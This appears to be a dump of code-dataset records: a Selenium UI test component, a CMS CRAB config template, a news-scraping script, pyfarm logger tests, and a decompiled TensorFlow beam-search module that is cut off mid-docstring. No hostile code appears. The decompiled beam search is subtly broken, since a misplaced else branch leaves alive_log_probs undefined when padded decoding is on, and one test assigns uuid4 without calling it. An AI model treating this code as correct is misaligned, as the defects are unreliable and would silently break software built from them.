not None:\n self.input_value_search(value)\n self.click_button_grid_search()\n self._wait_to_load()\n return self\n \n def search_item_via_date_time(self, field, start_day=None, end_day=None):\n self.select_dropdown_search_field(field)\n if start_day is not None:\n self.input_value_start_day(start_day)\n if end_day is not None:\n self.input_value_end_date(end_day)\n self.click_button_grid_search()\n self._wait_to_load()\n return self\n \n def search_item_via_option(self, field, option=None):\n self.select_dropdown_search_field(field)\n if option is not None:\n locator_dropdown_search_field = self.resolve_selector(\"send_to\")\n self.select_dropdown(locator_dropdown_search_field, option)\n self.click_button_grid_search()\n self._wait_to_load()\n return self\n \n def search_panel_should_contain(self):\n self.logger.info(\"Search panel should contain\")\n self.page_should_contain_element(\"search_label\")\n self.page_should_contain_element(\"input_value_search\")\n self.page_should_contain_element(\"dropdown_search_field\")\n self.page_should_contain_element(\"button_search\")\n return self\n\n","sub_path":"expense-ui-robot-tests/PythonExpenseAutomationTest/python/component/grid/GridSearchComponent.py","file_name":"GridSearchComponent.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"634279202","text":"from WMCore.Configuration import Configuration\nconfig = Configuration()\nconfig.section_('General')\nconfig.General.transferOutputs = True\nconfig.General.requestName = 'REQUESTNAME'\nconfig.section_('JobType')\nconfig.JobType.psetName = 'BTV-RunIIFall15DR76-00001_1_cfg.py'\n#config.JobType.inputFiles = ['../minbias.root']\n#config.JobType.outputFiles = ['output.root']\n#config.JobType.pyCfgParams = ['isData=0']\n#config.JobType.maxMemoryMB = 4000\nconfig.section_('Data')\nconfig.Data.totalUnits = -1\nconfig.Data.unitsPerJob = 1\nconfig.Data.splitting = 'FileBased'\nconfig.Data.publication = True\nconfig.Data.ignoreLocality = True\nconfig.Data.inputDataset = 'INPUTDATASET'\n#config.Data.inputDBS = 'phys03'\nconfig.Data.inputDBS = 'global'\nconfig.Data.outputDatasetTag = 'PUBLISHDATANAME'\nconfig.Data.publishDBS = 'https://cmsweb.cern.ch/dbs/prod/phys03/DBSWriter'\nconfig.Data.outLFNDirBase = 'OUTLFN'\nconfig.section_('User')\nconfig.section_('Site')\nconfig.Site.storageSite = 'T2_FR_IPHC'\n","sub_path":"SimProd/crabConfigTemplateGENSIMRAW.py","file_name":"crabConfigTemplateGENSIMRAW.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"40219932","text":"import time\nimport re\nimport selenium.common.exceptions\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\ndriver = webdriver.Chrome()\ndriver.get(r'http://www.cp79115.cn/tag/%E7%96%AB%E6%83%85')\nassert \"疫情\" in driver.title\n\ncount = 0\npages = 0\nfileName = 'covid_{:0>6d}.txt'.format(count)\n# 改为待保存目录\nsaveDir = r'/Users/fellno/0/Code/PyCharmProjects/DataMining/DataSets/TouTiao/疫情'\nnews_content = []\n\nwhile 1:\n try:\n # 显式等待页面加载\n element = WebDriverWait(driver, 60).until(EC.presence_of_element_located((By.TAG_NAME, \"h2\")))\n title = driver.find_elements_by_tag_name(\"h2\")\n contents = driver.find_elements_by_class_name(\"entry\")\n for i in range(len(title)):\n write_content = title[i].text + ' ' + contents[i].text\n write_content = re.sub(r'\\s*Tags: ', r' ', write_content)\n fileName = 'covid_{:0>6d}.txt'.format(count)\n with open(saveDir + '/' + fileName, 'w', encoding='utf8') as file:\n file.write(write_content)\n file.close()\n count += 1\n pages += 1\n print(\"{0} pages processed, {1} contents downloaded\".format(pages, count))\n try:\n nextPage = driver.find_element_by_xpath(r'//*[@id=\"content\"]/main/section/nav/div[2]/a')\n except selenium.common.exceptions.NoSuchElementException:\n break\n else:\n nextPage.click()\n except:\n driver.quit()\n","sub_path":"Selenium4Covid_210520.py","file_name":"Selenium4Covid_210520.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"13106413","text":"# No shebang line, this module is meant to be imported\n#\n# Copyright 2014 Oliver Palmer\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport re\nfrom collections import deque\nfrom datetime import datetime\nfrom os import urandom, remove\nfrom os.path import join, isfile, isdir, abspath\nfrom uuid import uuid4\n\nfrom twisted.internet import reactor\nfrom twisted.internet.defer import Deferred\n\nfrom pyfarm.core.enums import PY26\nfrom pyfarm.agent.config import config\nfrom pyfarm.agent.testutil import TestCase, skipIf\nfrom pyfarm.agent.utility import UnicodeCSVWriter\nfrom pyfarm.agent.sysinfo.cpu import total_cpus\nfrom pyfarm.jobtypes.core.log import (\n STDOUT, STDERR, STREAMS, CSVLog, LoggerPool, logpool)\n\n\nclass FakeProtocol(object):\n def __init__(self):\n self.uuid = uuid4()\n\n\nclass TestModuleLevel(TestCase):\n def test_stdout(self):\n self.assertEqual(STDOUT, 0)\n\n def test_stderr(self):\n self.assertEqual(STDERR, 1)\n\n def test_streams(self):\n self.assertEqual(STREAMS, set([STDERR, STDOUT]))\n\n\nclass TestCSVLog(TestCase):\n def setUp(self):\n super(TestCSVLog, self).setUp()\n self.log = CSVLog(open(self.create_file(), \"wb\"))\n\n @skipIf(PY26, \"Python 2.7+\")\n def test_lock_type(self):\n # same thread should have access to its own resources\n # can't use isinstance check....\n self.assertEqual(self.log.lock.__class__.__name__, \"_RLock\")\n\n def test_messages(self):\n self.assertIsInstance(self.log.messages, deque)\n self.assertEqual(self.log.messages, deque())\n\n def test_lines(self):\n self.assertEqual(self.log.lines, 0)\n\n def test_writer(self):\n self.assertIsInstance(self.log.csv, UnicodeCSVWriter)\n\n def test_file(self):\n self.assertIsInstance(self.log.file, file)\n\n def test_not_a_file(self):\n with self.assertRaises(TypeError):\n CSVLog(\"\")\n\n\nclass TestLoggerPool(TestCase):\n def setUp(self):\n super(TestLoggerPool, self).setUp()\n self.pool = None\n config[\"jobtype_logging_threadpool\"][\"min_threads\"] = 1\n config[\"jobtype_logging_threadpool\"][\"max_threads\"] = 2\n\n def tearDown(self):\n if self.pool is not None:\n self.pool.stop()\n\n def create_file(self, create=True):\n path = super(TestLoggerPool, self).create_file()\n if not create:\n remove(path)\n return path\n\n def test_existing_pool(self):\n self.assertIsInstance(logpool, LoggerPool)\n\n def test_invalid_minthreads(self):\n config[\"jobtype_logging_threadpool\"][\"min_threads\"] = 0\n\n with self.assertRaises(ValueError):\n LoggerPool()\n\n def test_auto_max_maxthreads(self):\n config[\"jobtype_logging_threadpool\"][\"max_threads\"] = \"auto\"\n pool = LoggerPool()\n self.assertEqual(\n pool.max, max(min(int(total_cpus() * 1.5), 20), pool.min))\n\n def test_minthreads_greater_than_maxthreads(self):\n config[\"jobtype_logging_threadpool\"][\"min_threads\"] = 5\n config[\"jobtype_logging_threadpool\"][\"max_threads\"] = 1\n\n with self.assertRaises(ValueError):\n LoggerPool()\n\n def test_protocol_already_open(self):\n protocol = 
FakeProtocol()\n pool = LoggerPool()\n pool.logs[protocol.uuid] = None\n with self.assertRaises(OSError):\n pool.open_log(protocol, self.create_file())\n\n def test_no_log_when_stopped(self):\n path = self.create_file(create=False)\n protocol = FakeProtocol()\n pool = self.pool = LoggerPool()\n pool.start()\n pool.open_log(protocol, path)\n\n pool.stop()\n pool.log(protocol.uuid, STDOUT, \"\")\n self.assertEqual(pool.logs, {})\n\n def test_log(self):\n path = self.create_file(create=False)\n uuid = uuid4\n pool = self.pool = LoggerPool()\n pool.start()\n pool.open_log(uuid, path)\n\n message = urandom(16).encode(\"hex\")\n pool.log(uuid, STDOUT, message)\n self.assertEqual(list(pool.logs[uuid].messages)[0][-1], message)\n self.assertEqual(pool.logs[uuid].lines, 1)\n\n def test_flush_from_log(self):\n path = self.create_file(create=False)\n uuid = uuid4()\n pool = self.pool = LoggerPool()\n pool.max_queued_lines = 2\n pool.flush_lines = 1\n pool.start()\n pool.open_log(uuid, path)\n finished = Deferred()\n\n # log two messages\n message1 = urandom(16).encode(\"hex\")\n pool.log(uuid, STDOUT, message1)\n self.assertEqual(list(pool.logs[uuid].messages)[0][-1], message1)\n message2 = urandom(16).encode(\"hex\")\n pool.log(uuid, STDOUT, message2)\n self.assertEqual(list(pool.logs[uuid].messages)[1][-1], message2)\n self.assertEqual(pool.logs[uuid].lines, 2)\n\n # log a third message (which should cause a flush)\n message3 = urandom(16).encode(\"hex\")\n pool.log(uuid, STDOUT, message3)\n\n # Keep checking to see if the data has been flushed\n def check_for_flush():\n if list(pool.logs[uuid].messages) == []:\n num_lines = 0\n with open(path, \"rb\") as f:\n for line in f:\n num_lines += 1\n self.assertEqual(num_lines, 3)\n finished.callback(True)\n else:\n # not flushed yet maybe?\n reactor.callLater(.1, check_for_flush)\n\n reactor.callLater(.1, check_for_flush)\n\n return finished\n\n def test_flush_log_object(self):\n path = self.create_file(create=False)\n uuid = uuid4()\n pool = self.pool = LoggerPool()\n pool.flush_lines = 1\n pool.start()\n pool.open_log(uuid, path)\n\n # log two messages\n message1 = urandom(16).encode(\"hex\")\n pool.log(uuid, STDOUT, message1)\n self.assertEqual(list(pool.logs[uuid].messages)[0][-1], message1)\n message2 = urandom(16).encode(\"hex\")\n pool.log(uuid, STDOUT, message2)\n self.assertEqual(\n list(pool.logs[uuid].messages)[1][-1], message2)\n self.assertEqual(pool.logs[uuid].lines, 2)\n\n pool.flush(pool.logs[uuid])\n self.assertEqual(list(pool.logs[uuid].messages), [])\n num_lines = 0\n with open(path, \"rb\") as f:\n for line in f:\n num_lines += 1\n self.assertEqual(num_lines, 2)\n\n def test_stop(self):\n path = self.create_file(create=False)\n uuid = uuid4()\n pool = self.pool = LoggerPool()\n pool.start()\n pool.open_log(uuid, path)\n\n # log two messages\n message1 = urandom(16).encode(\"hex\")\n pool.log(uuid, STDOUT, message1)\n self.assertEqual(list(pool.logs[uuid].messages)[0][-1], message1)\n message2 = urandom(16).encode(\"hex\")\n pool.log(uuid, STDOUT, message2)\n self.assertEqual(list(pool.logs[uuid].messages)[1][-1], message2)\n self.assertEqual(pool.logs[uuid].lines, 2)\n\n log = pool.logs[uuid]\n self.assertFalse(pool.stopped)\n pool.stop()\n self.assertTrue(pool.stopped)\n self.assertNotIn(uuid, pool.logs)\n self.assertTrue(log.file.closed)\n\n def test_start(self):\n existing_entries = reactor._eventTriggers[\"shutdown\"].before[:]\n pool = self.pool = LoggerPool()\n pool.start()\n self.assertTrue(pool.started)\n\n for entry in 
reactor._eventTriggers[\"shutdown\"].before:\n if entry not in existing_entries and entry[0] == pool.stop:\n break\n else:\n self.fail(\"Shutdown even trigger not added\")\n","sub_path":"tests/test_jobtypes/test_core_log.py","file_name":"test_core_log.py","file_ext":"py","file_size_in_byte":8144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"351300428","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/svpino/dev/tensorflow-object-detection-sagemaker/todl/tensorflow-object-detection/official/nlp/transformer/beam_search_v1.py\n# Compiled at: 2020-04-05 19:50:57\n# Size of source mod 2**32: 27301 bytes\n\"\"\"Beam search to find the translated sequence with the highest probability.\n\nSource implementation from Tensor2Tensor:\nhttps://github.com/tensorflow/tensor2tensor/blob/master/tensor2tensor/utils/beam_search.py\n\"\"\"\nimport numpy as np\nimport tensorflow.compat.v1 as tf\nfrom tensorflow.python.util import nest\n\ndef inf(dtype):\n \"\"\"Returns a value close to infinity, but is still finite in `dtype`.\n\n This is useful to get a very large value that is still zero when multiplied by\n zero. The floating-point \"Inf\" value is NaN when multiplied by zero.\n\n Args:\n dtype: A dtype. The returned value will be finite when casted to this dtype.\n\n Returns:\n A very large value.\n \"\"\"\n if dtype == 'float32' or dtype == 'bfloat16':\n return 10000000.0\n if dtype == 'float16':\n return np.finfo(np.float16).max\n raise AssertionError('Invalid dtype: %s' % dtype)\n\n\nclass _StateKeys(object):\n __doc__ = 'Keys to dictionary storing the state of the beam search loop.'\n CUR_INDEX = 'CUR_INDEX'\n ALIVE_SEQ = 'ALIVE_SEQ'\n ALIVE_LOG_PROBS = 'ALIVE_LOG_PROBS'\n ALIVE_CACHE = 'ALIVE_CACHE'\n FINISHED_SEQ = 'FINISHED_SEQ'\n FINISHED_SCORES = 'FINISHED_SCORES'\n FINISHED_FLAGS = 'FINISHED_FLAGS'\n\n\nclass SequenceBeamSearch(object):\n __doc__ = 'Implementation of beam search loop.'\n\n def __init__(self, symbols_to_logits_fn, vocab_size, batch_size, beam_size, alpha, max_decode_length, eos_id, padded_decode, dtype=tf.float32):\n \"\"\"Initialize sequence beam search.\n\n Args:\n symbols_to_logits_fn: A function to provide logits, which is the\n interface to the Transformer model. The passed in arguments are:\n ids -> A tensor with shape [batch_size * beam_size, index].\n index -> A scalar.\n cache -> A nested dictionary of tensors [batch_size * beam_size, ...].\n The function must return a tuple of logits and the updated cache:\n logits -> A tensor with shape [batch * beam_size, vocab_size].\n updated cache -> A nested dictionary with the same structure as the\n input cache.\n vocab_size: An integer, the size of the vocabulary, used for topk\n computation.\n batch_size: An integer, the decode batch size.\n beam_size: An integer, number of beams for beam search.\n alpha: A float, defining the strength of length normalization.\n max_decode_length: An integer, the maximum number of steps to decode\n a sequence.\n eos_id: An integer. ID of end of sentence token.\n padded_decode: A bool, indicating if max_sequence_length padding is used\n for beam search.\n dtype: A tensorflow data type used for score computation. 
The default is\n tf.float32.\n \"\"\"\n self.symbols_to_logits_fn = symbols_to_logits_fn\n self.vocab_size = vocab_size\n self.batch_size = batch_size\n self.beam_size = beam_size\n self.alpha = alpha\n self.max_decode_length = max_decode_length\n self.eos_id = eos_id\n self.padded_decode = padded_decode\n self.dtype = tf.as_dtype(dtype)\n\n def search(self, initial_ids, initial_cache):\n \"\"\"Beam search for sequences with highest scores.\"\"\"\n state, state_shapes = self._create_initial_state(initial_ids, initial_cache)\n finished_state = tf.while_loop((self._continue_search),\n (self._search_step), loop_vars=[state], shape_invariants=[\n state_shapes],\n parallel_iterations=1,\n back_prop=False)\n finished_state = finished_state[0]\n alive_seq = finished_state[_StateKeys.ALIVE_SEQ]\n alive_log_probs = finished_state[_StateKeys.ALIVE_LOG_PROBS]\n finished_seq = finished_state[_StateKeys.FINISHED_SEQ]\n finished_scores = finished_state[_StateKeys.FINISHED_SCORES]\n finished_flags = finished_state[_StateKeys.FINISHED_FLAGS]\n finished_seq = tf.where(tf.reduce_any(finished_flags, 1), finished_seq, alive_seq)\n finished_scores = tf.where(tf.reduce_any(finished_flags, 1), finished_scores, alive_log_probs)\n return (finished_seq, finished_scores)\n\n def _create_initial_state(self, initial_ids, initial_cache):\n \"\"\"Return initial state dictionary and its shape invariants.\n\n Args:\n initial_ids: initial ids to pass into the symbols_to_logits_fn.\n int tensor with shape [batch_size, 1]\n initial_cache: dictionary storing values to be passed into the\n symbols_to_logits_fn.\n\n Returns:\n state and shape invariant dictionaries with keys from _StateKeys\n \"\"\"\n for key, value in initial_cache.items():\n for inner_value in nest.flatten(value):\n if inner_value.dtype != self.dtype:\n raise TypeError(\"initial_cache element for key '%s' has dtype %s that does not match SequenceBeamSearch's dtype of %s. 
Value: %s\" % (\n key, value.dtype.name, self.dtype.name, inner_value))\n\n cur_index = tf.constant(0)\n alive_seq = _expand_to_beam_size(initial_ids, self.beam_size)\n alive_seq = tf.expand_dims(alive_seq, axis=2)\n if self.padded_decode:\n alive_seq = tf.tile(alive_seq, [1, 1, self.max_decode_length + 1])\n else:\n initial_log_probs = tf.constant([\n [\n 0.0] + [-float('inf')] * (self.beam_size - 1)],\n dtype=(self.dtype))\n alive_log_probs = tf.tile(initial_log_probs, [self.batch_size, 1])\n alive_cache = nest.map_structure(lambda t: _expand_to_beam_size(t, self.beam_size), initial_cache)\n finished_seq = tf.zeros(tf.shape(alive_seq), tf.int32)\n finished_scores = tf.ones([self.batch_size, self.beam_size], dtype=(self.dtype)) * -inf(self.dtype)\n finished_flags = tf.zeros([self.batch_size, self.beam_size], tf.bool)\n state = {_StateKeys.CUR_INDEX: cur_index, \n _StateKeys.ALIVE_SEQ: alive_seq, \n _StateKeys.ALIVE_LOG_PROBS: alive_log_probs, \n _StateKeys.ALIVE_CACHE: alive_cache, \n _StateKeys.FINISHED_SEQ: finished_seq, \n _StateKeys.FINISHED_SCORES: finished_scores, \n _StateKeys.FINISHED_FLAGS: finished_flags}\n if self.padded_decode:\n state_shape_invariants = {_StateKeys.CUR_INDEX: tf.TensorShape([]), \n \n _StateKeys.ALIVE_SEQ: tf.TensorShape([\n self.batch_size, self.beam_size,\n self.max_decode_length + 1]), \n \n _StateKeys.ALIVE_LOG_PROBS: tf.TensorShape([self.batch_size, self.beam_size]), \n \n _StateKeys.ALIVE_CACHE: nest.map_structure(_get_shape, alive_cache), \n \n _StateKeys.FINISHED_SEQ: tf.TensorShape([\n self.batch_size, self.beam_size,\n self.max_decode_length + 1]), \n \n _StateKeys.FINISHED_SCORES: tf.TensorShape([self.batch_size, self.beam_size]), \n \n _StateKeys.FINISHED_FLAGS: tf.TensorShape([self.batch_size, self.beam_size])}\n else:\n state_shape_invariants = {_StateKeys.CUR_INDEX: tf.TensorShape([]), \n \n _StateKeys.ALIVE_SEQ: tf.TensorShape([None, self.beam_size, None]), \n \n _StateKeys.ALIVE_LOG_PROBS: tf.TensorShape([None, self.beam_size]), \n \n _StateKeys.ALIVE_CACHE: nest.map_structure(_get_shape_keep_last_dim, alive_cache), \n \n _StateKeys.FINISHED_SEQ: tf.TensorShape([None, self.beam_size, None]), \n \n _StateKeys.FINISHED_SCORES: tf.TensorShape([None, self.beam_size]), \n \n _StateKeys.FINISHED_FLAGS: tf.TensorShape([None, self.beam_size])}\n return (state, state_shape_invariants)\n\n def _continue_search(self, state):\n \"\"\"Return whether to continue the search loop.\n\n The loops should terminate when\n 1) when decode length has been reached, or\n 2) when the worst score in the finished sequences is better than the best\n score in the alive sequences (i.e. 
the finished sequences are provably\n unchanging)\n\n Args:\n state: A dictionary with the current loop state.\n\n Returns:\n Bool tensor with value True if loop should continue, False if loop should\n terminate.\n \"\"\"\n i = state[_StateKeys.CUR_INDEX]\n alive_log_probs = state[_StateKeys.ALIVE_LOG_PROBS]\n finished_scores = state[_StateKeys.FINISHED_SCORES]\n finished_flags = state[_StateKeys.FINISHED_FLAGS]\n not_at_max_decode_length = tf.less(i, self.max_decode_length)\n max_length_norm = _length_normalization((self.alpha), (self.max_decode_length), dtype=(self.dtype))\n best_alive_scores = alive_log_probs[:, 0] / max_length_norm\n finished_scores *= tf.cast(finished_flags, self.dtype)\n lowest_finished_scores = tf.reduce_min(finished_scores, axis=1)\n finished_batches = tf.reduce_any(finished_flags, 1)\n lowest_finished_scores += (1.0 - tf.cast(finished_batches, self.dtype)) * -inf(self.dtype)\n worst_finished_score_better_than_best_alive_score = tf.reduce_all(tf.greater(lowest_finished_scores, best_alive_scores))\n return tf.logical_and(not_at_max_decode_length, tf.logical_not(worst_finished_score_better_than_best_alive_score))\n\n def _search_step(self, state):\n \"\"\"Beam search loop body.\n\n Grow alive sequences by a single ID. Sequences that have reached the EOS\n token are marked as finished. The alive and finished sequences with the\n highest log probabilities and scores are returned.\n\n A sequence's finished score is calculating by dividing the log probability\n by the length normalization factor. Without length normalization, the\n search is more likely to return shorter sequences.\n\n Args:\n state: A dictionary with the current loop state.\n\n Returns:\n new state dictionary.\n \"\"\"\n new_seq, new_log_probs, topk_ids, new_cache = self._grow_alive_seq(state)\n new_finished_flags = tf.equal(topk_ids, self.eos_id)\n alive_state = self._get_new_alive_state(new_seq, new_log_probs, new_finished_flags, new_cache)\n finished_state = self._get_new_finished_state(state, new_seq, new_log_probs, new_finished_flags)\n new_state = {_StateKeys.CUR_INDEX: state[_StateKeys.CUR_INDEX] + 1}\n new_state.update(alive_state)\n new_state.update(finished_state)\n return [new_state]\n\n def _grow_alive_seq(self, state):\n \"\"\"Grow alive sequences by one token, and collect top 2*beam_size sequences.\n\n 2*beam_size sequences are collected because some sequences may have reached\n the EOS token. 
2*beam_size ensures that at least beam_size sequences are\n still alive.\n\n Args:\n state: A dictionary with the current loop state.\n Returns:\n Tuple of\n (Top 2*beam_size sequences [batch_size, 2 * beam_size, cur_index + 1],\n Scores of returned sequences [batch_size, 2 * beam_size],\n New alive cache, for each of the 2 * beam_size sequences)\n \"\"\"\n i = state[_StateKeys.CUR_INDEX]\n alive_seq = state[_StateKeys.ALIVE_SEQ]\n alive_log_probs = state[_StateKeys.ALIVE_LOG_PROBS]\n alive_cache = state[_StateKeys.ALIVE_CACHE]\n beams_to_keep = 2 * self.beam_size\n if self.padded_decode:\n flat_ids = tf.reshape(tf.slice(alive_seq, [0, 0, i], [self.batch_size, self.beam_size, 1]), [\n self.batch_size * self.beam_size, -1])\n else:\n flat_ids = _flatten_beam_dim(alive_seq)\n flat_cache = nest.map_structure(_flatten_beam_dim, alive_cache)\n flat_logits, flat_cache = self.symbols_to_logits_fn(flat_ids, i, flat_cache)\n logits = _unflatten_beam_dim(flat_logits, self.batch_size, self.beam_size)\n new_cache = nest.map_structure(lambda t: _unflatten_beam_dim(t, self.batch_size, self.beam_size), flat_cache)\n candidate_log_probs = _log_prob_from_logits(logits)\n log_probs = candidate_log_probs + tf.expand_dims(alive_log_probs, axis=2)\n flat_log_probs = tf.reshape(log_probs, [\n -1, self.beam_size * self.vocab_size])\n topk_log_probs, topk_indices = tf.nn.top_k(flat_log_probs, k=beams_to_keep)\n topk_beam_indices = topk_indices // self.vocab_size\n topk_seq, new_cache = _gather_beams([\n alive_seq, new_cache], topk_beam_indices, self.batch_size, beams_to_keep)\n topk_ids = topk_indices % self.vocab_size\n if self.padded_decode:\n topk_seq = tf.transpose(topk_seq, perm=[2, 0, 1])\n topk_seq = tf.tensor_scatter_nd_update(topk_seq, [[i + 1]], tf.expand_dims(topk_ids, axis=0))\n topk_seq = tf.transpose(topk_seq, perm=[1, 2, 0])\n else:\n topk_seq = tf.concat([topk_seq, tf.expand_dims(topk_ids, axis=2)], axis=2)\n return (\n topk_seq, topk_log_probs, topk_ids, new_cache)\n\n def _get_new_alive_state(self, new_seq, new_log_probs, new_finished_flags, new_cache):\n \"\"\"Gather the top k sequences that are still alive.\n\n Args:\n new_seq: New sequences generated by growing the current alive sequences\n int32 tensor with shape [batch_size, 2 * beam_size, cur_index + 1]\n new_log_probs: Log probabilities of new sequences float32 tensor with\n shape [batch_size, beam_size]\n new_finished_flags: A boolean Tensor indicates which sequences are live\n inside the beam.\n new_cache: Dict of cached values for each sequence.\n\n Returns:\n Dictionary with alive keys from _StateKeys:\n {Top beam_size sequences that are still alive (don't end with eos_id)\n Log probabilities of top alive sequences\n Dict cache storing decoder states for top alive sequences}\n \"\"\"\n new_log_probs += tf.cast(new_finished_flags, self.dtype) * -inf(self.dtype)\n top_alive_seq, top_alive_log_probs, top_alive_cache = _gather_topk_beams([\n new_seq, new_log_probs, new_cache], new_log_probs, self.batch_size, self.beam_size)\n return {_StateKeys.ALIVE_SEQ: top_alive_seq, \n _StateKeys.ALIVE_LOG_PROBS: top_alive_log_probs, \n _StateKeys.ALIVE_CACHE: top_alive_cache}\n\n def _get_new_finished_state(self, state, new_seq, new_log_probs, new_finished_flags):\n \"\"\"Combine new and old finished sequences, and gather the top k sequences.\n\n Args:\n state: A dictionary with the current loop state.\n new_seq: New sequences generated by growing the current alive sequences\n int32 tensor with shape [batch_size, beam_size, i + 1]\n new_log_probs: 
Log probabilities of new sequences float32 tensor with\n shape [batch_size, beam_size]\n new_finished_flags: A boolean Tensor indicates which sequences are live\n inside the beam.\n\n Returns:\n Dictionary with finished keys from _StateKeys:\n {Top beam_size finished sequences based on score,\n Scores of finished sequences,\n Finished flags of finished sequences}\n \"\"\"\n i = state[_StateKeys.CUR_INDEX]\n finished_seq = state[_StateKeys.FINISHED_SEQ]\n finished_scores = state[_StateKeys.FINISHED_SCORES]\n finished_flags = state[_StateKeys.FINISHED_FLAGS]\n if not self.padded_decode:\n finished_seq = tf.concat([\n finished_seq,\n tf.zeros([self.batch_size, self.beam_size, 1], tf.int32)],\n axis=2)\n length_norm = _length_normalization((self.alpha), (i + 1), dtype=(self.dtype))\n new_scores = new_log_probs / length_norm\n new_scores += (1.0 - tf.cast(new_finished_flags, self.dtype)) * -inf(self.dtype)\n finished_seq = tf.concat([finished_seq, new_seq], axis=1)\n finished_scores = tf.concat([finished_scores, new_scores], axis=1)\n finished_flags = tf.concat([finished_flags, new_finished_flags], axis=1)\n top_finished_seq, top_finished_scores, top_finished_flags = _gather_topk_beams([finished_seq, finished_scores, finished_flags], finished_scores, self.batch_size, self.beam_size)\n return {_StateKeys.FINISHED_SEQ: top_finished_seq, \n _StateKeys.FINISHED_SCORES: top_finished_scores, \n _StateKeys.FINISHED_FLAGS: top_finished_flags}\n\n\ndef sequence_beam_search(symbols_to_logits_fn, initial_ids, initial_cache, vocab_size, beam_size, alpha, max_decode_length, eos_id, padded_decode=False):\n \"\"\"Search for sequence of subtoken ids with the largest probability.\n\n Args:\n symbols_to_logits_fn: A function that takes in ids, index, and cache as\n arguments. The passed in arguments will have shape:\n ids -> A tensor with shape [batch_size * beam_size, index].\n index -> A scalar.\n cache -> A nested dictionary of tensors [batch_size * beam_size, ...].\n The function must return a tuple of logits and new cache:\n logits -> A tensor with shape [batch * beam_size, vocab_size].\n new cache -> A nested dictionary with the same shape/structure as the\n inputted cache.\n initial_ids: An int32 tensor with shape [batch_size]. 
Starting ids for\n each batch item.\n initial_cache: A dictionary, containing starting decoder variables\n information.\n vocab_size: An integer, the size of the vocabulary, used for topk\n computation.\n beam_size: An integer, the number of beams.\n alpha: A float, defining the strength of length normalization.\n max_decode_length: An integer, the maximum length to decode a sequence.\n eos_id: An integer, ID of eos token, used to determine when a sequence has\n finished.\n padded_decode: A bool, indicating if max_sequence_length padding is used\n for beam search.\n\n Returns:\n Top decoded sequences [batch_size, beam_size, max_decode_length]\n sequence scores [batch_size, beam_size]\n \"\"\"\n batch_size = initial_ids.shape.as_list()[0] if padded_decode else tf.shape(initial_ids)[0]\n sbs = SequenceBeamSearch(symbols_to_logits_fn, vocab_size, batch_size, beam_size, alpha, max_decode_length, eos_id, padded_decode)\n return sbs.search(initial_ids, initial_cache)\n\n\ndef _log_prob_from_logits(logits):\n return logits - tf.reduce_logsumexp(logits, axis=2, keepdims=True)\n\n\ndef _length_normalization(alpha, length, dtype=tf.float32):\n \"\"\"Return length normalization factor.\"\"\"\n return tf.pow((5.0 + tf.cast(length, dtype)) / 6.0, alpha)\n\n\ndef _expand_to_beam_size(tensor, beam_size):\n \"\"\"Tiles a given tensor by beam_size.\n\n Args:\n tensor: tensor to tile [batch_size, ...]\n beam_size: How much to tile the tensor by.\n\n Returns:\n Tiled tensor [batch_size, beam_size, ...]\n \"\"\"\n tensor = tf.expand_dims(tensor, axis=1)\n tile_dims = [1] * tensor.shape.ndims\n tile_dims[1] = beam_size\n return tf.tile(tensor, tile_dims)\n\n\ndef _shape_list(tensor):\n \"\"\"Return a list of the tensor's shape, and ensure no None values in list.\"\"\"\n shape = tensor.get_shape().as_list()\n dynamic_shape = tf.shape(tensor)\n for i in range(len(shape)):\n if shape[i] is None:\n shape[i] = dynamic_shape[i]\n\n return shape\n\n\ndef _get_shape_keep_last_dim(tensor):\n shape_list = _shape_list(tensor)\n for i in range(len(shape_list) - 1):\n shape_list[i] = None\n\n if isinstance(shape_list[-1], tf.Tensor):\n shape_list[-1] = None\n return tf.TensorShape(shape_list)\n\n\ndef _get_shape(tensor):\n \"\"\"Return the shape of the input tensor.\"\"\"\n return tf.TensorShape(_shape_list(tensor))\n\n\ndef _flatten_beam_dim(tensor):\n \"\"\"Reshapes the first two dimensions into a single dimension.\n\n Args:\n tensor: Tensor to reshape of shape [A, B, ...]\n\n Returns:\n Reshaped tensor of shape [A*B, ...]\n \"\"\"\n shape = _shape_list(tensor)\n shape[0] *= shape[1]\n shape.pop(1)\n return tf.reshape(tensor, shape)\n\n\ndef _unflatten_beam_dim(tensor, batch_size, beam_size):\n \"\"\"Reshapes first dimension back to [batch_size, beam_size].\n\n Args:\n tensor: Tensor to reshape of shape [batch_size*beam_size, ...]\n batch_size: Tensor, original batch size.\n beam_size: int, original beam size.\n\n Returns:\n Reshaped tensor of shape [batch_size, beam_size, ...]\n \"\"\"\n shape = _shape_list(tensor)\n new_shape = [batch_size, beam_size] + shape[1:]\n return tf.reshape(tensor, new_shape)\n\n\ndef _gather_beams(nested, beam_indices, batch_size, new_beam_size):\n \"\"\"Gather beams from nested structure of tensors.\n\n Each tensor in nested represents a batch of beams, where beam refers to a\n single search state (beam search involves searching through multiple states\n in parallel).\n\n This function is used to gather the top beams, specified by\n beam_indices, from the nested tensors.\n\n Args:\n nested: 
